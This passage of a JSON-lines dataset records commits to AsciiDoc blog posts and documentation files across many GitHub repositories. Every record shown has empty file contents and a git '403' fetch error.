2017-02-02-The-Cost-of-Ember.adoc","repos":"sandersky\/sandersky.github.io,sandersky\/sandersky.github.io,sandersky\/sandersky.github.io,sandersky\/sandersky.github.io","old_file":"_posts\/2017-02-02-The-Cost-of-Ember.adoc","new_file":"_posts\/2017-02-02-The-Cost-of-Ember.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sandersky\/sandersky.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"866a65101bd6969e90c68f9d19575d6ffa67ddaf","subject":"Update 2017-04-01-image-File-Reader.adoc","message":"Update 2017-04-01-image-File-Reader.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-04-01-image-File-Reader.adoc","new_file":"_posts\/2017-04-01-image-File-Reader.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e830438b9291b9d14b521a38aedbfc2fc7d115f7","subject":"updating content to use WildFly image and service","message":"updating content to use WildFly image and service\n","repos":"ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs","old_file":"developer-tools\/java\/chapters\/ch10-monitoring.adoc","new_file":"developer-tools\/java\/chapters\/ch10-monitoring.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ManoMarks\/labs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9549ab489ad2e74ac45ea733fdc8f45477587ad1","subject":"New Utilities section","message":"New Utilities section\n","repos":"OpenHFT\/Chronicle-Queue,OpenHFT\/Chronicle-Queue","old_file":"docs\/utilities.adoc","new_file":"docs\/utilities.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/OpenHFT\/Chronicle-Queue.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"055eee7425d00e270f38a7fbfeb88470e0b9345c","subject":"Update 2017-02-21-Episode-89-Fadgeting-with-your-Dinner-Sausage.adoc","message":"Update 2017-02-21-Episode-89-Fadgeting-with-your-Dinner-Sausage.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2017-02-21-Episode-89-Fadgeting-with-your-Dinner-Sausage.adoc","new_file":"_posts\/2017-02-21-Episode-89-Fadgeting-with-your-Dinner-Sausage.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blahcadepodcast\/blahcadepodcast.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"92101b39caa8ad07ceead76884bad8ddf820566f","subject":"Update 2020-03-10-Translate-GLSL-to-SPIRV-for-Vulkan-at-Runtime.adoc","message":"Update 2020-03-10-Translate-GLSL-to-SPIRV-for-Vulkan-at-Runtime.adoc","repos":"lxjk\/lxjk.github.io,lxjk\/lxjk.github.io,lxjk\/lxjk.github.io,lxjk\/lxjk.github.io","old_file":"_posts\/2020-03-10-Translate-GLSL-to-SPIRV-for-Vulkan-at-Runtime.adoc","new_file":"_posts\/2020-03-10-Translate-GLSL-to-SPIRV-for-Vulkan-at-Runtime.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lxjk\/lxjk.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7c10044a323dd07340df9c63d0ef8a33254f53ab","subject":"Update 2016-04-09-The-Meaning-of-Types.adoc","message":"Update 2016-04-09-The-Meaning-of-Types.adoc","repos":"reggert\/reggert.github.io,reggert\/reggert.github.io,reggert\/reggert.github.io,reggert\/reggert.github.io","old_file":"_posts\/2016-04-09-The-Meaning-of-Types.adoc","new_file":"_posts\/2016-04-09-The-Meaning-of-Types.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/reggert\/reggert.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d32de45b336391afaa12266763e74d85802cb2a3","subject":"Update 2017-01-18-FW4SPL-1103-released.adoc","message":"Update 2017-01-18-FW4SPL-1103-released.adoc","repos":"fw4spl-org\/fw4spl-blog,fw4spl-org\/fw4spl-blog,fw4spl-org\/fw4spl-blog","old_file":"_posts\/2017-01-18-FW4SPL-1103-released.adoc","new_file":"_posts\/2017-01-18-FW4SPL-1103-released.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fw4spl-org\/fw4spl-blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"edc61d0c36306f3a76a603c062234674c4483c9c","subject":"Update 2018-07-30-Facebook-A-P-Iver311.adoc","message":"Update 2018-07-30-Facebook-A-P-Iver311.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-07-30-Facebook-A-P-Iver311.adoc","new_file":"_posts\/2018-07-30-Facebook-A-P-Iver311.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"960e60f9e69bc8b17e23893ec576d6fd3379eb52","subject":"y2b create post Apple Thunderbolt Display Unboxing","message":"y2b create post Apple Thunderbolt Display Unboxing","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-03-30-Apple-Thunderbolt-Display-Unboxing.adoc","new_file":"_posts\/2012-03-30-Apple-Thunderbolt-Display-Unboxing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8344353825e4d36fa10bc3ffdd8d75a095e794e6","subject":"Update 2016-12-06-A-Second-Post.adoc","message":"Update 2016-12-06-A-Second-Post.adoc","repos":"scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io","old_file":"_posts\/2016-12-06-A-Second-Post.adoc","new_file":"_posts\/2016-12-06-A-Second-Post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scottellis64\/scottellis64.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2f9ed7e8d95ead7f2d6df2baf6724d0d8b6dd2bd","subject":"Add rest spec","message":"Add rest spec","repos":"gentics\/mesh,gentics\/mesh,gentics\/mesh,gentics\/mesh","old_file":"doc\/src\/main\/asciidoc\/rest-spec.adoc","new_file":"doc\/src\/main\/asciidoc\/rest-spec.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gentics\/mesh.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e8526fb1c70ceb81343b7c94c9cf43ce6dc5618c","subject":"Update 2017-06-08-Dogma-und-Methode.adoc","message":"Update 2017-06-08-Dogma-und-Methode.adoc","repos":"backemulus\/backemulus.github.io,backemulus\/backemulus.github.io,backemulus\/backemulus.github.io,backemulus\/backemulus.github.io","old_file":"_posts\/2017-06-08-Dogma-und-Methode.adoc","new_file":"_posts\/2017-06-08-Dogma-und-Methode.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/backemulus\/backemulus.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fe6bcaed396b6a0ee55d6a569a397670c88402f7","subject":"Update 2015-03-19-youtubeLoudnessNormalisation.adoc","message":"Update 2015-03-19-youtubeLoudnessNormalisation.adoc","repos":"hanwencheng\/Undepth,hanwencheng\/Undepth,hanwencheng\/Undepth","old_file":"_posts\/2015-03-19-youtubeLoudnessNormalisation.adoc","new_file":"_posts\/2015-03-19-youtubeLoudnessNormalisation.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hanwencheng\/Undepth.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c39e610c96c9bd5351b42c13aa6934d9e8eb1f0f","subject":"Update 2016-03-10-Grand-Central-Dispatch-i-O-S.adoc","message":"Update 2016-03-10-Grand-Central-Dispatch-i-O-S.adoc","repos":"jtsiros\/jtsiros.github.io,jtsiros\/jtsiros.github.io,jtsiros\/jtsiros.github.io,jtsiros\/jtsiros.github.io","old_file":"_posts\/2016-03-10-Grand-Central-Dispatch-i-O-S.adoc","new_file":"_posts\/2016-03-10-Grand-Central-Dispatch-i-O-S.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jtsiros\/jtsiros.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f3a331759d4eb470244f6eba8fa167024852fe4f","subject":"Update 2015-08-23-Daisies-arent-roses.adoc","message":"Update 2015-08-23-Daisies-arent-roses.adoc","repos":"2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io","old_file":"_posts\/2015-08-23-Daisies-arent-roses.adoc","new_file":"_posts\/2015-08-23-Daisies-arent-roses.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/2wce\/2wce.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"adcc0472dc6d58d92964d26ba939bdf5fdc68fd7","subject":"Update 2016-08-19-laravel-with-pusher.adoc","message":"Update 2016-08-19-laravel-with-pusher.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-08-19-laravel-with-pusher.adoc","new_file":"_posts\/2016-08-19-laravel-with-pusher.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6df1adba52c4f7193f7de8c470a6ddc7a324cbd3","subject":"Update 2017-06-07-Why-You-No-Have-NTP.adoc","message":"Update 2017-06-07-Why-You-No-Have-NTP.adoc","repos":"jarbro\/jarbro.github.io,jarbro\/jarbro.github.io,jarbro\/jarbro.github.io,jarbro\/jarbro.github.io","old_file":"_posts\/2017-06-07-Why-You-No-Have-NTP.adoc","new_file":"_posts\/2017-06-07-Why-You-No-Have-NTP.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jarbro\/jarbro.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"496d83368936c56d248f0521cb03fef4c4712d2c","subject":"Update 2018-04-01-Why-did-you-do-that.adoc","message":"Update 2018-04-01-Why-did-you-do-that.adoc","repos":"anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog","old_file":"_posts\/2018-04-01-Why-did-you-do-that.adoc","new_file":"_posts\/2018-04-01-Why-did-you-do-that.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anandjagadeesh\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9772c6d5571e0079358fadb106c6d88c75e59e11","subject":"Update 2018-04-01-Why-did-you-do-that.adoc","message":"Update 2018-04-01-Why-did-you-do-that.adoc","repos":"anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog","old_file":"_posts\/2018-04-01-Why-did-you-do-that.adoc","new_file":"_posts\/2018-04-01-Why-did-you-do-that.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anandjagadeesh\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"915078661be3b8aecabf0764b9e09b59f359b1a3","subject":"Update 2019-02-04-Google-Spread-Sheet.adoc","message":"Update 2019-02-04-Google-Spread-Sheet.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-02-04-Google-Spread-Sheet.adoc","new_file":"_posts\/2019-02-04-Google-Spread-Sheet.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4bbf7e49fbcf43e8d5fbc565cae91cebd8c0f0ef","subject":"Custom email invoice formatter - Initial Commit","message":"Custom email invoice formatter - Initial Commit","repos":"killbill\/killbill-docs,killbill\/killbill-docs","old_file":"userguide\/tutorials\/custom-email-formatter.adoc","new_file":"userguide\/tutorials\/custom-email-formatter.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/killbill\/killbill-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"efbecdf583b74a3ba9ff34c1dd57f757748cc0f7","subject":"AsciiDoc template for API guide.","message":"AsciiDoc template for API guide.\n","repos":"vtsukur\/spring-rest-black-market,vtsukur\/spring-rest-black-market,vtsukur\/spring-rest-black-market","old_file":"src\/docs\/asciidoc\/api-guide.adoc","new_file":"src\/docs\/asciidoc\/api-guide.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/vtsukur\/spring-rest-black-market.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4414b1238fe14d099a7b5dde4209c93f28be4768","subject":"y2b create post MacBook Pro 2011 Unboxing (Quad-Core)","message":"y2b create post MacBook Pro 2011 Unboxing (Quad-Core)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-06-07-MacBook-Pro-2011-Unboxing-QuadCore.adoc","new_file":"_posts\/2011-06-07-MacBook-Pro-2011-Unboxing-QuadCore.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6478e048eb75090fcf6f94cbc8a5cc80059d3e39","subject":"Update 2015-06-30-A-few-old-Regular-Expression-tools.adoc","message":"Update 2015-06-30-A-few-old-Regular-Expression-tools.adoc","repos":"Ugotsta\/Ugotsta.github.io,Ugotsta\/Ugotsta.github.io,Ugotsta\/Ugotsta.github.io,Ugotsta\/Ugotsta.github.io","old_file":"_posts\/2015-06-30-A-few-old-Regular-Expression-tools.adoc","new_file":"_posts\/2015-06-30-A-few-old-Regular-Expression-tools.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Ugotsta\/Ugotsta.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"beec98ecc70d0b3915534bd374d85cedf5a00a96","subject":"Update 2015-09-21-Learn-Python-The-Hard-Way.adoc","message":"Update 2015-09-21-Learn-Python-The-Hard-Way.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-09-21-Learn-Python-The-Hard-Way.adoc","new_file":"_posts\/2015-09-21-Learn-Python-The-Hard-Way.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0eee72adde985f8aba37b3ab61d9a630aa466f47","subject":"y2b create post How To Turn Anything Into A Speaker!","message":"y2b create post How To Turn Anything Into A Speaker!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-09-16-How-To-Turn-Anything-Into-A-Speaker.adoc","new_file":"_posts\/2016-09-16-How-To-Turn-Anything-Into-A-Speaker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c0467fdf1ced656403bbf66cbffe4a346c21fbe6","subject":"Update 2016-07-22-Performance-tip-for-tuning-S-Q-L-with-U-N-I-O-N.adoc","message":"Update 2016-07-22-Performance-tip-for-tuning-S-Q-L-with-U-N-I-O-N.adoc","repos":"mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io","old_file":"_posts\/2016-07-22-Performance-tip-for-tuning-S-Q-L-with-U-N-I-O-N.adoc","new_file":"_posts\/2016-07-22-Performance-tip-for-tuning-S-Q-L-with-U-N-I-O-N.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mikealdo\/mikealdo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"572cef380b0e403ed0c070392eafa3cd9d52f72c","subject":"Add GoogleCloudPlatform","message":"Add GoogleCloudPlatform\n","repos":"Abdennebi\/ProTips","old_file":"GoogleCloudPlatform.adoc","new_file":"GoogleCloudPlatform.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Abdennebi\/ProTips.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5f3cdf6c862157bee598e7bf32555fc929996659","subject":"Wording","message":"Wording\n","repos":"oliviercailloux\/jee,oliviercailloux\/java-course,oliviercailloux\/java-course","old_file":"Best practices\/Exceptions.adoc","new_file":"Best practices\/Exceptions.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/java-course.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"25a6b4ae229d991de1869912b5928d2b11139308","subject":"Publish 2016-09-innovation-Engineer-Aruaru.adoc","message":"Publish 2016-09-innovation-Engineer-Aruaru.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"2016-09-innovation-Engineer-Aruaru.adoc","new_file":"2016-09-innovation-Engineer-Aruaru.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a28037c8fdd5f425790631d919b4354932cbe42b","subject":"Add events page","message":"Add events page\n","repos":"gentics\/mesh,gentics\/mesh,gentics\/mesh,gentics\/mesh","old_file":"doc\/src\/main\/docs\/events.asciidoc","new_file":"doc\/src\/main\/docs\/events.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gentics\/mesh.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9efa91e5b437d7b4a0c8275aaed6e3e2c995e6cf","subject":"add notes for specifying validation rules","message":"add notes for specifying validation rules\n","repos":"mygithubwork\/boot-works,mygithubwork\/boot-works,verydapeng\/boot-works,verydapeng\/boot-works","old_file":"validation.adoc","new_file":"validation.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mygithubwork\/boot-works.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"211834b241905fd4cd464392bda84f2a0cce1096","subject":"Update 2015-09-23-Garbage-Collection.adoc","message":"Update 2015-09-23-Garbage-Collection.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-09-23-Garbage-Collection.adoc","new_file":"_posts\/2015-09-23-Garbage-Collection.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"762011df8005e19555c5f72c68ee401bf520e4d8","subject":"Update 2016-03-04-Spying-on-values.adoc","message":"Update 2016-03-04-Spying-on-values.adoc","repos":"caryfitzhugh\/caryfitzhugh.github.io,caryfitzhugh\/caryfitzhugh.github.io,caryfitzhugh\/caryfitzhugh.github.io","old_file":"_posts\/2016-03-04-Spying-on-values.adoc","new_file":"_posts\/2016-03-04-Spying-on-values.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/caryfitzhugh\/caryfitzhugh.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a392d31da1968659484a059f4481a8a778e972cb","subject":"Update 2019-01-31-My-English-Title.adoc","message":"Update 2019-01-31-My-English-Title.adoc","repos":"raytong82\/raytong82.github.io,raytong82\/raytong82.github.io,raytong82\/raytong82.github.io,raytong82\/raytong82.github.io","old_file":"_posts\/2019-01-31-My-English-Title.adoc","new_file":"_posts\/2019-01-31-My-English-Title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/raytong82\/raytong82.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3557ce763eb049f35060e5156816838b641252a7","subject":"Update 2016-06-09-I-Phone-A-P-Pin-Philippines.adoc","message":"Update 2016-06-09-I-Phone-A-P-Pin-Philippines.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-06-09-I-Phone-A-P-Pin-Philippines.adoc","new_file":"_posts\/2016-06-09-I-Phone-A-P-Pin-Philippines.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bdb2acd6108fe43126e45a7ef14d9de2691fb5ce","subject":"Update 2017-06-13-neural_network_from_scratch.adoc","message":"Update 2017-06-13-neural_network_from_scratch.adoc","repos":"elinep\/blog,elinep\/blog,elinep\/blog,elinep\/blog","old_file":"_posts\/2017-06-13-neural_network_from_scratch.adoc","new_file":"_posts\/2017-06-13-neural_network_from_scratch.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/elinep\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8439b15f07c12e357fae3bd4a45797da504bd2c7","subject":"Create do-codebase-improvements-fil.adoc","message":"Create do-codebase-improvements-fil.adoc\n\nFilipino translation for do-codebase-improvements.adoc","repos":"eddiejaoude\/book-open-source-tips","old_file":"src\/do\/do-codebase-improvements-fil.adoc","new_file":"src\/do\/do-codebase-improvements-fil.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/eddiejaoude\/book-open-source-tips.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"525bfceb78af41b472b776af480863e60e68b0f5","subject":"Update 2017-07-04-Azure-5.adoc","message":"Update 2017-07-04-Azure-5.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-04-Azure-5.adoc","new_file":"_posts\/2017-07-04-Azure-5.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cc6aa9b44521b64a0cd489f04e173859637e838f","subject":"Update 2018-09-25-Scratch.adoc","message":"Update 2018-09-25-Scratch.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-09-25-Scratch.adoc","new_file":"_posts\/2018-09-25-Scratch.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e1051fc5c1970c2014be7c2b74bb3e07d3483d7d","subject":"Update 2016-02-24-Mickeys-Soundsational-Parade-live-stream-tonight.adoc","message":"Update 2016-02-24-Mickeys-Soundsational-Parade-live-stream-tonight.adoc","repos":"mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io","old_file":"_posts\/2016-02-24-Mickeys-Soundsational-Parade-live-stream-tonight.adoc","new_file":"_posts\/2016-02-24-Mickeys-Soundsational-Parade-live-stream-tonight.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mouseguests\/mouseguests.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e12e196c749aac7546377c66ca5254800c248880","subject":"Publish 2012-12-4-Jogando-o-Censo-2010-no-PostgreSQL.adoc","message":"Publish 2012-12-4-Jogando-o-Censo-2010-no-PostgreSQL.adoc","repos":"arthurmolina\/arthurmolina.github.io,arthurmolina\/arthurmolina.github.io,arthurmolina\/arthurmolina.github.io,arthurmolina\/arthurmolina.github.io","old_file":"2012-12-4-Jogando-o-Censo-2010-no-PostgreSQL.adoc","new_file":"2012-12-4-Jogando-o-Censo-2010-no-PostgreSQL.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/arthurmolina\/arthurmolina.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"551884d15dc7d3ab71bce168201c742aaf7396ef","subject":"v1.78","message":"v1.78\n","repos":"dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core,dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core,kisel\/trex-core,kisel\/trex-core","old_file":"release_notes.asciidoc","new_file":"release_notes.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kisel\/trex-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"39562d8dbb46bdf0fd63f23275c867d3a570c633","subject":"Update 2019-03-10-.adoc","message":"Update 2019-03-10-.adoc","repos":"cncgl\/cncgl.github.io,cncgl\/cncgl.github.io,cncgl\/cncgl.github.io,cncgl\/cncgl.github.io","old_file":"_posts\/2019-03-10-.adoc","new_file":"_posts\/2019-03-10-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cncgl\/cncgl.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c9ddf1ffa8db64bfdd40bfb66f872faf59d85ad7","subject":"Update 2018-12-20-jira-howtouse.adoc","message":"Update 2018-12-20-jira-howtouse.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-12-20-jira-howtouse.adoc","new_file":"_posts\/2018-12-20-jira-howtouse.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1923a6ce36b1fe626b5230259ff6460b19ef85e2","subject":"Create file","message":"Create file","repos":"XillioQA\/xill-platform-3.4,XillioQA\/xill-platform-3.4,XillioQA\/xill-platform-3.4,XillioQA\/xill-platform-3.4","old_file":"xill-web-service\/tmp-test\/create-worker\/curl-request.adoc","new_file":"xill-web-service\/tmp-test\/create-worker\/curl-request.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/XillioQA\/xill-platform-3.4.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5c86573cc5e9ad12db6aaae06db20e94362f45f0","subject":"Update 2015-08-15-Een-test.adoc","message":"Update 